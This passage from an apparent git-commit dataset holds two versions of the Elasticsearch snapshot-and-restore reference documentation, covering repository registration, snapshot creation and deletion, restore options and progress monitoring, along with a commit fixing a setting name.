shared file system repository it is necessary to mount the same shared filesystem to the same location on all\nmaster and data nodes. This location (or one of its parent directories) must be registered in the `path.repo`\nsetting on all master and data nodes.\n\nAssuming that the shared filesystem is mounted to `\/mount\/backups\/my_backup`, the following setting should be added to\n`elasticsearch.yml` file:\n\n[source,yaml]\n--------------\npath.repo: [\"\/mount\/backups\", \"\/mount\/longterm_backups\"]\n--------------\n\nThe `path.repo` setting supports Microsoft Windows UNC paths as long as at least server name and share are specified as\na prefix and back slashes are properly escaped:\n\n[source,yaml]\n--------------\npath.repo: [\"\\\\\\\\MY_SERVER\\\\Snapshots\"]\n--------------\n\nAfter all nodes are restarted, the following command can be used to register the shared file system repository with\nthe name `my_backup`:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_fs_backup\n{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"\/mount\/backups\/my_fs_backup_location\",\n \"compress\": true\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[skip:no access to absolute path]\n\nIf the repository location is specified as a relative path this path will be resolved against the first path specified\nin `path.repo`:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_fs_backup\n{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_fs_backup_location\",\n \"compress\": true\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe following settings are supported:\n\n[horizontal]\n`location`:: Location of the snapshots. Mandatory.\n`compress`:: Turns on compression of the snapshot files. Compression is applied only to metadata files (index mapping and settings). Data files are not compressed. Defaults to `true`.\n`chunk_size`:: Big files can be broken down into chunks during snapshotting if needed. The chunk size can be specified in bytes or by\n using size value notation, i.e. 1g, 10m, 5k. Defaults to `null` (unlimited chunk size).\n`max_restore_bytes_per_sec`:: Throttles per node restore rate. Defaults to `40mb` per second.\n`max_snapshot_bytes_per_sec`:: Throttles per node snapshot rate. Defaults to `40mb` per second.\n`readonly`:: Makes repository read-only. Defaults to `false`.\n\n[float]\n===== Read-only URL Repository\n\nThe URL repository (`\"type\": \"url\"`) can be used as an alternative read-only way to access data created by the shared file\nsystem repository. The URL specified in the `url` parameter should point to the root of the shared filesystem repository.\nThe following settings are supported:\n\n[horizontal]\n`url`:: Location of the snapshots. Mandatory.\n\nURL Repository supports the following protocols: \"http\", \"https\", \"ftp\", \"file\" and \"jar\". URL repositories with `http:`,\n`https:`, and `ftp:` URLs has to be whitelisted by specifying allowed URLs in the `repositories.url.allowed_urls` setting.\nThis setting supports wildcards in the place of host, path, query, and fragment. For example:\n\n[source,yaml]\n-----------------------------------\nrepositories.url.allowed_urls: [\"http:\/\/www.example.org\/root\/*\", \"https:\/\/*.mydomain.com\/*?*#*\"]\n-----------------------------------\n\nURL repositories with `file:` URLs can only point to locations registered in the `path.repo` setting similar to\nshared file system repository.\n\n[float]\n===== Repository plugins\n\nOther repository backends are available in these official plugins:\n\n* {plugins}\/repository-s3.html[repository-s3] for S3 repository support\n* {plugins}\/repository-hdfs.html[repository-hdfs] for HDFS repository support in Hadoop environments\n* {plugins}\/repository-azure.html[repository-azure] for Azure storage repositories\n* {plugins}\/repository-gcs.html[repository-gcs] for Google Cloud Storage repositories\n\n[float]\n===== Repository Verification\nWhen a repository is registered, it's immediately verified on all master and data nodes to make sure that it is functional\non all nodes currently present in the cluster. The `verify` parameter can be used to explicitly disable the repository\nverification when registering or updating a repository:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_unverified_backup?verify=false\n{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_unverified_backup_location\"\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe verification process can also be executed manually by running the following command:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_unverified_backup\/_verify\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nIt returns a list of nodes where repository was successfully verified or an error message if verification process failed.\n\n[float]\n=== Snapshot\n\nA repository can contain multiple snapshots of the same cluster. Snapshots are identified by unique names within the\ncluster. A snapshot with the name `snapshot_1` in the repository `my_backup` can be created by executing the following\ncommand:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\/snapshot_1?wait_for_completion=true\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe `wait_for_completion` parameter specifies whether or not the request should return immediately after snapshot\ninitialization (default) or wait for snapshot completion. During snapshot initialization, information about all\nprevious snapshots is loaded into the memory, which means that in large repositories it may take several seconds (or\neven minutes) for this command to return even if the `wait_for_completion` parameter is set to `false`.\n\nBy default a snapshot of all open and started indices in the cluster is created. This behavior can be changed by\nspecifying the list of indices in the body of the snapshot request.\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\/snapshot_2?wait_for_completion=true\n{\n \"indices\": \"index_1,index_2\",\n \"ignore_unavailable\": true,\n \"include_global_state\": false\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe list of indices that should be included into the snapshot can be specified using the `indices` parameter that\nsupports <<search-multi-index-type,multi index syntax>>. The snapshot request also supports the\n`ignore_unavailable` option. Setting it to `true` will cause indices that do not exist to be ignored during snapshot\ncreation. By default, when `ignore_unavailable` option is not set and an index is missing the snapshot request will fail.\nBy setting `include_global_state` to false it's possible to prevent the cluster global state to be stored as part of\nthe snapshot. By default, the entire snapshot will fail if one or more indices participating in the snapshot don't have\nall primary shards available. This behaviour can be changed by setting `partial` to `true`.\n\nThe index snapshot process is incremental. In the process of making the index snapshot Elasticsearch analyses\nthe list of the index files that are already stored in the repository and copies only files that were created or\nchanged since the last snapshot. That allows multiple snapshots to be preserved in the repository in a compact form.\nSnapshotting process is executed in non-blocking fashion. All indexing and searching operation can continue to be\nexecuted against the index that is being snapshotted. However, a snapshot represents the point-in-time view of the index\nat the moment when snapshot was created, so no records that were added to the index after the snapshot process was started\nwill be present in the snapshot. The snapshot process starts immediately for the primary shards that has been started\nand are not relocating at the moment. Before version 1.2.0, the snapshot operation fails if the cluster has any relocating or\ninitializing primaries of indices participating in the snapshot. Starting with version 1.2.0, Elasticsearch waits for\nrelocation or initialization of shards to complete before snapshotting them.\n\nBesides creating a copy of each index the snapshot process can also store global cluster metadata, which includes persistent\ncluster settings and templates. The transient settings and registered snapshot repositories are not stored as part of\nthe snapshot.\n\nOnly one snapshot process can be executed in the cluster at any time. While snapshot of a particular shard is being\ncreated this shard cannot be moved to another node, which can interfere with rebalancing process and allocation\nfiltering. Elasticsearch will only be able to move a shard to another node (according to the current allocation\nfiltering settings and rebalancing algorithm) once the snapshot is finished.\n\nOnce a snapshot is created information about this snapshot can be obtained using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThis command returns basic information about the snapshot including start and end time, version of\nelasticsearch that created the snapshot, the list of included indices, the current state of the\nsnapshot and the list of failures that occurred during the snapshot. The snapshot `state` can be\n\n[horizontal]\n`IN_PROGRESS`::\n\n The snapshot is currently running.\n\n`SUCCESS`::\n\n The snapshot finished and all shards were stored successfully.\n\n`FAILED`::\n\n The snapshot finished with an error and failed to store any data.\n\n`PARTIAL`::\n\n The global cluster state was stored, but data of at least one shard wasn't stored successfully.\n The `failure` section in this case should contain more detailed information about shards\n that were not processed correctly.\n\n`INCOMPATIBLE`::\n\n The snapshot was created with an old version of elasticsearch and therefore is incompatible with\n the current version of the cluster.\n\n\nSimilar as for repositories, information about multiple snapshots can be queried in one go, supporting wildcards as well:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_*,some_other_snapshot\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nAll snapshots currently stored in the repository can be listed using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_all\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe command fails if some of the snapshots are unavailable. The boolean parameter `ignore_unavailable` can be used to\nreturn all snapshots that are currently available.\n\nGetting all snapshots in the repository can be costly on cloud-based repositories,\nboth from a cost and performance perspective. If the only information required is\nthe snapshot names\/uuids in the repository and the indices in each snapshot, then\nthe optional boolean parameter `verbose` can be set to `false` to execute a more\nperformant and cost-effective retrieval of the snapshots in the repository. Note\nthat setting `verbose` to `false` will omit all other information about the snapshot\nsuch as status information, the number of snapshotted shards, etc. The default\nvalue of the `verbose` parameter is `true`.\n\nA currently running snapshot can be retrieved using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_current\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nA snapshot can be deleted from the repository using the following command:\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\/snapshot_2\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nWhen a snapshot is deleted from a repository, Elasticsearch deletes all files that are associated with the deleted\nsnapshot and not used by any other snapshots. If the deleted snapshot operation is executed while the snapshot is being\ncreated the snapshotting process will be aborted and all files created as part of the snapshotting process will be\ncleaned. Therefore, the delete snapshot operation can be used to cancel long running snapshot operations that were\nstarted by mistake.\n\nA repository can be deleted using the following command:\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_fs_backup\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nWhen a repository is deleted, Elasticsearch only removes the reference to the location where the repository is storing\nthe snapshots. The snapshots themselves are left untouched and in place.\n\n[float]\n=== Restore\n\nA snapshot can be restored using the following command:\n\n[source,sh]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nBy default, all indices in the snapshot are restored, and the cluster state is\n*not* restored. It's possible to select indices that should be restored as well\nas to allow the global cluster state from being restored by using `indices` and\n`include_global_state` options in the restore request body. The list of indices\nsupports <<search-multi-index-type,multi index syntax>>. The `rename_pattern`\nand `rename_replacement` options can be also used to rename indices on restore\nusing regular expression that supports referencing the original text as\nexplained\nhttp:\/\/docs.oracle.com\/javase\/6\/docs\/api\/java\/util\/regex\/Matcher.html#appendReplacement(java.lang.StringBuffer,%20java.lang.String)[here].\nSet `include_aliases` to `false` to prevent aliases from being restored together\nwith associated indices\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n{\n \"indices\": \"index_1,index_2\",\n \"ignore_unavailable\": true,\n \"include_global_state\": true,\n \"rename_pattern\": \"index_(.+)\",\n \"rename_replacement\": \"restored_index_$1\"\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe restore operation can be performed on a functioning cluster. However, an\nexisting index can be only restored if it's <<indices-open-close,closed>> and\nhas the same number of shards as the index in the snapshot. The restore\noperation automatically opens restored indices if they were closed and creates\nnew indices if they didn't exist in the cluster. If cluster state is restored\nwith `include_global_state` (defaults to `false`), the restored templates that\ndon't currently exist in the cluster are added and existing templates with the\nsame name are replaced by the restored templates. The restored persistent\nsettings are added to the existing persistent settings.\n\n[float]\n==== Partial restore\n\nBy default, the entire restore operation will fail if one or more indices participating in the operation don't have\nsnapshots of all shards available. It can occur if some shards failed to snapshot for example. It is still possible to\nrestore such indices by setting `partial` to `true`. Please note, that only successfully snapshotted shards will be\nrestored in this case and all missing shards will be recreated empty.\n\n\n[float]\n==== Changing index settings during restore\n\nMost of index settings can be overridden during the restore process. For example, the following command will restore\nthe index `index_1` without creating any replicas while switching back to default refresh interval:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n{\n \"indices\": \"index_1\",\n \"index_settings\": {\n \"index.number_of_replicas\": 0\n },\n \"ignore_index_settings\": [\n \"index.refresh_interval\"\n ]\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nPlease note, that some settings such as `index.number_of_shards` cannot be changed during restore operation.\n\n[float]\n==== Restoring to a different cluster\n\nThe information stored in a snapshot is not tied to a particular cluster or a cluster name. Therefore it's possible to\nrestore a snapshot made from one cluster into another cluster. All that is required is registering the repository\ncontaining the snapshot in the new cluster and starting the restore process. The new cluster doesn't have to have the\nsame size or topology. However, the version of the new cluster should be the same or newer (only 1 major version newer) than the cluster that was used to create the snapshot. For example, you can restore a 1.x snapshot to a 2.x cluster, but not a 1.x snapshot to a 5.x cluster.\n\nIf the new cluster has a smaller size additional considerations should be made. First of all it's necessary to make sure\nthat new cluster have enough capacity to store all indices in the snapshot. It's possible to change indices settings\nduring restore to reduce the number of replicas, which can help with restoring snapshots into smaller cluster. It's also\npossible to select only subset of the indices using the `indices` parameter.\n\nIf indices in the original cluster were assigned to particular nodes using\n<<shard-allocation-filtering,shard allocation filtering>>, the same rules will be enforced in the new cluster. Therefore\nif the new cluster doesn't contain nodes with appropriate attributes that a restored index can be allocated on, such\nindex will not be successfully restored unless these index allocation settings are changed during restore operation.\n\nThe restore operation also checks that restored persistent settings are compatible with the current cluster to avoid accidentally\nrestoring an incompatible settings such as `discovery.zen.minimum_master_nodes` and as a result disable a smaller cluster until the\nrequired number of master eligible nodes is added. If you need to restore a snapshot with incompatible persistent settings, try\nrestoring it without the global cluster state.\n\n[float]\n=== Snapshot status\n\nA list of currently running snapshots with their detailed status information can be obtained using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nIn this format, the command will return information about all currently running snapshots. By specifying a repository name, it's possible\nto limit the results to a particular repository:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nIf both repository name and snapshot id are specified, this command will return detailed status information for the given snapshot even\nif it's not currently running:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nMultiple ids are also supported:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1,snapshot_2\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n[float]\n=== Monitoring snapshot\/restore progress\n\nThere are several ways to monitor the progress of the snapshot and restores processes while they are running. Both\noperations support `wait_for_completion` parameter that would block client until the operation is completed. This is\nthe simplest method that can be used to get notified about operation completion.\n\nThe snapshot operation can be also monitored by periodic calls to the snapshot info:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nPlease note that snapshot info operation uses the same resources and thread pool as the snapshot operation. So,\nexecuting a snapshot info operation while large shards are being snapshotted can cause the snapshot info operation to wait\nfor available resources before returning the result. On very large shards the wait time can be significant.\n\nTo get more immediate and complete information about snapshots the snapshot status command can be used instead:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nWhile snapshot info method returns only basic information about the snapshot in progress, the snapshot status returns\ncomplete breakdown of the current state for each shard participating in the snapshot.\n\nThe restore process piggybacks on the standard recovery mechanism of the Elasticsearch. As a result, standard recovery\nmonitoring services can be used to monitor the state of restore. When restore operation is executed the cluster\ntypically goes into `red` state. It happens because the restore operation starts with \"recovering\" primary shards of the\nrestored indices. During this operation the primary shards become unavailable which manifests itself in the `red` cluster\nstate. Once recovery of primary shards is completed Elasticsearch is switching to standard replication process that\ncreates the required number of replicas at this moment cluster switches to the `yellow` state. Once all required replicas\nare created, the cluster switches to the `green` states.\n\nThe cluster health operation provides only a high level status of the restore process. It's possible to get more\ndetailed insight into the current state of the recovery process by using <<indices-recovery, indices recovery>> and\n<<cat-recovery, cat recovery>> APIs.\n\n[float]\n=== Stopping currently running snapshot and restore operations\n\nThe snapshot and restore framework allows running only one snapshot or one restore operation at a time. If a currently\nrunning snapshot was executed by mistake, or takes unusually long, it can be terminated using the snapshot delete operation.\nThe snapshot delete operation checks if the deleted snapshot is currently running and if it does, the delete operation stops\nthat snapshot before deleting the snapshot data from the repository.\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe restore operation uses the standard shard recovery mechanism. Therefore, any currently running restore operation can\nbe canceled by deleting indices that are being restored. Please note that data for all deleted indices will be removed\nfrom the cluster as a result of this operation.\n\n[float]\n=== Effect of cluster blocks on snapshot and restore operations\nMany snapshot and restore operations are affected by cluster and index blocks. For example, registering and unregistering\nrepositories require write global metadata access. The snapshot operation requires that all indices and their metadata as\nwell as the global metadata were readable. The restore operation requires the global metadata to be writable, however\nthe index level blocks are ignored during restore because indices are essentially recreated during restore.\nPlease note that a repository content is not part of the cluster and therefore cluster blocks don't affect internal\nrepository operations such as listing or deleting snapshots from an already registered repository.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"64bc5331bed562257e08b0599df7de59151f6f60","subject":"[Docs] Correct setting name in snapshot\/restore documentation (#22023)","message":"[Docs] Correct setting name in snapshot\/restore documentation (#22023)\n\nThere is no setting include_cluster_state for snapshot restore. The correct name for this setting is include_global_state.","repos":"strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc","old_file":"docs\/reference\/modules\/snapshots.asciidoc","new_file":"docs\/reference\/modules\/snapshots.asciidoc","new_contents":"[[modules-snapshots]]\n== Snapshot And Restore\n\nThe snapshot and restore module allows to create snapshots of individual\nindices or an entire cluster into a remote repository like shared file system,\nS3, or HDFS. These snapshots are great for backups because they can be restored\nrelatively quickly but they are not archival because they can only be restored\nto versions of Elasticsearch that can read the index. That means that:\n\n* A snapshot of an index created in 2.x can be restored to 5.x.\n* A snapshot of an index created in 1.x can be restored to 2.x.\n* A snapshot of an index created in 1.x can **not** be restored to 5.x.\n\nTo restore a snapshot of an index created in 1.x to 5.x you can restore it to\na 2.x cluster and use <<reindex-from-remote,reindex-from-remote>> to rebuild\nthe index in a 5.x cluster. This is as time consuming as restoring from\narchival copies of the original data.\n\n[float]\n=== Repositories\n\nBefore any snapshot or restore operation can be performed, a snapshot repository should be registered in\nElasticsearch. The repository settings are repository-type specific. See below for details.\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\n{\n \"type\": \"fs\",\n \"settings\": {\n ... repository specific settings ...\n }\n}\n-----------------------------------\n\nOnce a repository is registered, its information can be obtained using the following command:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/my_backup\n-----------------------------------\n\/\/ CONSOLE\n\nwhich returns:\n\n[source,js]\n-----------------------------------\n{\n \"my_backup\": {\n \"type\": \"fs\",\n \"settings\": {\n \"compress\": true,\n \"location\": \"\/mount\/backups\/my_backup\"\n }\n }\n}\n-----------------------------------\n\nInformation about multiple repositories can be fetched in one go by using a comma-delimited list of repository names.\nStar wildcards are supported as well. For example, information about repositories that start with `repo` or that contain `backup`\ncan be obtained using the following command:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/repo*,*backup*\n-----------------------------------\n\nIf a repository name is not specified, or `_all` is used as repository name Elasticsearch will return information about\nall repositories currently registered in the cluster:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\n-----------------------------------\n\nor\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/_all\n-----------------------------------\n\n[float]\n===== Shared File System Repository\n\nThe shared file system repository (`\"type\": \"fs\"`) uses the shared file system to store snapshots. In order to register\nthe shared file system repository it is necessary to mount the same shared filesystem to the same location on all\nmaster and data nodes. This location (or one of its parent directories) must be registered in the `path.repo`\nsetting on all master and data nodes.\n\nAssuming that the shared filesystem is mounted to `\/mount\/backups\/my_backup`, the following setting should be added to\n`elasticsearch.yml` file:\n\n[source,yaml]\n--------------\npath.repo: [\"\/mount\/backups\", \"\/mount\/longterm_backups\"]\n--------------\n\nThe `path.repo` setting supports Microsoft Windows UNC paths as long as at least server name and share are specified as\na prefix and back slashes are properly escaped:\n\n[source,yaml]\n--------------\npath.repo: [\"\\\\\\\\MY_SERVER\\\\Snapshots\"]\n--------------\n\nAfter all nodes are restarted, the following command can be used to register the shared file system repository with\nthe name `my_backup`:\n\n[source,js]\n-----------------------------------\n$ curl -XPUT 'http:\/\/localhost:9200\/_snapshot\/my_backup' -d '{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"\/mount\/backups\/my_backup\",\n \"compress\": true\n }\n}'\n-----------------------------------\n\nIf the repository location is specified as a relative path this path will be resolved against the first path specified\nin `path.repo`:\n\n[source,js]\n-----------------------------------\n$ curl -XPUT 'http:\/\/localhost:9200\/_snapshot\/my_backup' -d '{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_backup\",\n \"compress\": true\n }\n}'\n-----------------------------------\n\nThe following settings are supported:\n\n[horizontal]\n`location`:: Location of the snapshots. Mandatory.\n`compress`:: Turns on compression of the snapshot files. Compression is applied only to metadata files (index mapping and settings). Data files are not compressed. Defaults to `true`.\n`chunk_size`:: Big files can be broken down into chunks during snapshotting if needed. The chunk size can be specified in bytes or by\n using size value notation, i.e. 1g, 10m, 5k. Defaults to `null` (unlimited chunk size).\n`max_restore_bytes_per_sec`:: Throttles per node restore rate. Defaults to `40mb` per second.\n`max_snapshot_bytes_per_sec`:: Throttles per node snapshot rate. Defaults to `40mb` per second.\n`readonly`:: Makes repository read-only. Defaults to `false`.\n\n[float]\n===== Read-only URL Repository\n\nThe URL repository (`\"type\": \"url\"`) can be used as an alternative read-only way to access data created by the shared file\nsystem repository. The URL specified in the `url` parameter should point to the root of the shared filesystem repository.\nThe following settings are supported:\n\n[horizontal]\n`url`:: Location of the snapshots. Mandatory.\n\nURL Repository supports the following protocols: \"http\", \"https\", \"ftp\", \"file\" and \"jar\". URL repositories with `http:`,\n`https:`, and `ftp:` URLs has to be whitelisted by specifying allowed URLs in the `repositories.url.allowed_urls` setting.\nThis setting supports wildcards in the place of host, path, query, and fragment. For example:\n\n[source,yaml]\n-----------------------------------\nrepositories.url.allowed_urls: [\"http:\/\/www.example.org\/root\/*\", \"https:\/\/*.mydomain.com\/*?*#*\"]\n-----------------------------------\n\nURL repositories with `file:` URLs can only point to locations registered in the `path.repo` setting similar to\nshared file system repository.\n\n[float]\n===== Repository plugins\n\nOther repository backends are available in these official plugins:\n\n* {plugins}\/repository-s3.html[repository-s3] for S3 repository support\n* {plugins}\/repository-hdfs.html[repository-hdfs] for HDFS repository support in Hadoop environments\n* {plugins}\/repository-azure.html[repository-azure] for Azure storage repositories\n* {plugins}\/repository-gcs.html[repository-gcs] for Google Cloud Storage repositories\n\n[float]\n===== Repository Verification\nWhen a repository is registered, it's immediately verified on all master and data nodes to make sure that it is functional\non all nodes currently present in the cluster. The `verify` parameter can be used to explicitly disable the repository\nverification when registering or updating a repository:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/s3_repository?verify=false\n{\n \"type\": \"s3\",\n \"settings\": {\n \"bucket\": \"my_s3_bucket\",\n \"region\": \"eu-west-1\"\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\nThe verification process can also be executed manually by running the following command:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/s3_repository\/_verify\n-----------------------------------\n\/\/ CONSOLE\n\nIt returns a list of nodes where repository was successfully verified or an error message if verification process failed.\n\n[float]\n=== Snapshot\n\nA repository can contain multiple snapshots of the same cluster. Snapshots are identified by unique names within the\ncluster. A snapshot with the name `snapshot_1` in the repository `my_backup` can be created by executing the following\ncommand:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\/snapshot_1?wait_for_completion=true\n-----------------------------------\n\/\/ CONSOLE\n\nThe `wait_for_completion` parameter specifies whether or not the request should return immediately after snapshot\ninitialization (default) or wait for snapshot completion. During snapshot initialization, information about all\nprevious snapshots is loaded into the memory, which means that in large repositories it may take several seconds (or\neven minutes) for this command to return even if the `wait_for_completion` parameter is set to `false`.\n\nBy default a snapshot of all open and started indices in the cluster is created. This behavior can be changed by\nspecifying the list of indices in the body of the snapshot request.\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\/snapshot_1\n{\n \"indices\": \"index_1,index_2\",\n \"ignore_unavailable\": true,\n \"include_global_state\": false\n}\n-----------------------------------\n\/\/ CONSOLE\n\nThe list of indices that should be included into the snapshot can be specified using the `indices` parameter that\nsupports <<search-multi-index-type,multi index syntax>>. The snapshot request also supports the\n`ignore_unavailable` option. Setting it to `true` will cause indices that do not exist to be ignored during snapshot\ncreation. By default, when `ignore_unavailable` option is not set and an index is missing the snapshot request will fail.\nBy setting `include_global_state` to false it's possible to prevent the cluster global state to be stored as part of\nthe snapshot. By default, the entire snapshot will fail if one or more indices participating in the snapshot don't have\nall primary shards available. This behaviour can be changed by setting `partial` to `true`.\n\nThe index snapshot process is incremental. In the process of making the index snapshot Elasticsearch analyses\nthe list of the index files that are already stored in the repository and copies only files that were created or\nchanged since the last snapshot. That allows multiple snapshots to be preserved in the repository in a compact form.\nSnapshotting process is executed in non-blocking fashion. All indexing and searching operation can continue to be\nexecuted against the index that is being snapshotted. However, a snapshot represents the point-in-time view of the index\nat the moment when snapshot was created, so no records that were added to the index after the snapshot process was started\nwill be present in the snapshot. The snapshot process starts immediately for the primary shards that has been started\nand are not relocating at the moment. Before version 1.2.0, the snapshot operation fails if the cluster has any relocating or\ninitializing primaries of indices participating in the snapshot. Starting with version 1.2.0, Elasticsearch waits for\nrelocation or initialization of shards to complete before snapshotting them.\n\nBesides creating a copy of each index the snapshot process can also store global cluster metadata, which includes persistent\ncluster settings and templates. The transient settings and registered snapshot repositories are not stored as part of\nthe snapshot.\n\nOnly one snapshot process can be executed in the cluster at any time. While snapshot of a particular shard is being\ncreated this shard cannot be moved to another node, which can interfere with rebalancing process and allocation\nfiltering. Elasticsearch will only be able to move a shard to another node (according to the current allocation\nfiltering settings and rebalancing algorithm) once the snapshot is finished.\n\nOnce a snapshot is created information about this snapshot can be obtained using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\nSimilar as for repositories, information about multiple snapshots can be queried in one go, supporting wildcards as well:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_*,some_other_snapshot\n-----------------------------------\n\/\/ CONSOLE\n\nAll snapshots currently stored in the repository can be listed using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_all\n-----------------------------------\n\/\/ CONSOLE\n\nThe command fails if some of the snapshots are unavailable. The boolean parameter `ignore_unavailable` can be used to\nreturn all snapshots that are currently available.\n\nA currently running snapshot can be retrieved using the following command:\n\n[source,sh]\n-----------------------------------\n$ curl -XGET \"localhost:9200\/_snapshot\/my_backup\/_current\"\n-----------------------------------\n\nA snapshot can be deleted from the repository using the following command:\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\nWhen a snapshot is deleted from a repository, Elasticsearch deletes all files that are associated with the deleted\nsnapshot and not used by any other snapshots. If the deleted snapshot operation is executed while the snapshot is being\ncreated the snapshotting process will be aborted and all files created as part of the snapshotting process will be\ncleaned. Therefore, the delete snapshot operation can be used to cancel long running snapshot operations that were\nstarted by mistake.\n\nA repository can be deleted using the following command:\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\n-----------------------------------\n\/\/ CONSOLE\n\nWhen a repository is deleted, Elasticsearch only removes the reference to the location where the repository is storing\nthe snapshots. The snapshots themselves are left untouched and in place.\n\n[float]\n=== Restore\n\nA snapshot can be restored using the following command:\n\n[source,sh]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n-----------------------------------\n\/\/ CONSOLE\n\nBy default, all indices in the snapshot are restored, and the cluster state is\n*not* restored. It's possible to select indices that should be restored as well\nas to allow the global cluster state from being restored by using `indices` and\n`include_global_state` options in the restore request body. The list of indices\nsupports <<search-multi-index-type,multi index syntax>>. The `rename_pattern`\nand `rename_replacement` options can be also used to rename indices on restore\nusing regular expression that supports referencing the original text as\nexplained\nhttp:\/\/docs.oracle.com\/javase\/6\/docs\/api\/java\/util\/regex\/Matcher.html#appendReplacement(java.lang.StringBuffer,%20java.lang.String)[here].\nSet `include_aliases` to `false` to prevent aliases from being restored together\nwith associated indices\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n{\n \"indices\": \"index_1,index_2\",\n \"ignore_unavailable\": true,\n \"include_global_state\": true,\n \"rename_pattern\": \"index_(.+)\",\n \"rename_replacement\": \"restored_index_$1\"\n}\n-----------------------------------\n\/\/ CONSOLE\n\nThe restore operation can be performed on a functioning cluster. However, an\nexisting index can be only restored if it's <<indices-open-close,closed>> and\nhas the same number of shards as the index in the snapshot. The restore\noperation automatically opens restored indices if they were closed and creates\nnew indices if they didn't exist in the cluster. If cluster state is restored\nwith `include_global_state` (defaults to `false`), the restored templates that\ndon't currently exist in the cluster are added and existing templates with the\nsame name are replaced by the restored templates. The restored persistent\nsettings are added to the existing persistent settings.\n\n[float]\n==== Partial restore\n\nBy default, the entire restore operation will fail if one or more indices participating in the operation don't have\nsnapshots of all shards available. It can occur if some shards failed to snapshot for example. It is still possible to\nrestore such indices by setting `partial` to `true`. Please note, that only successfully snapshotted shards will be\nrestored in this case and all missing shards will be recreated empty.\n\n\n[float]\n==== Changing index settings during restore\n\nMost of 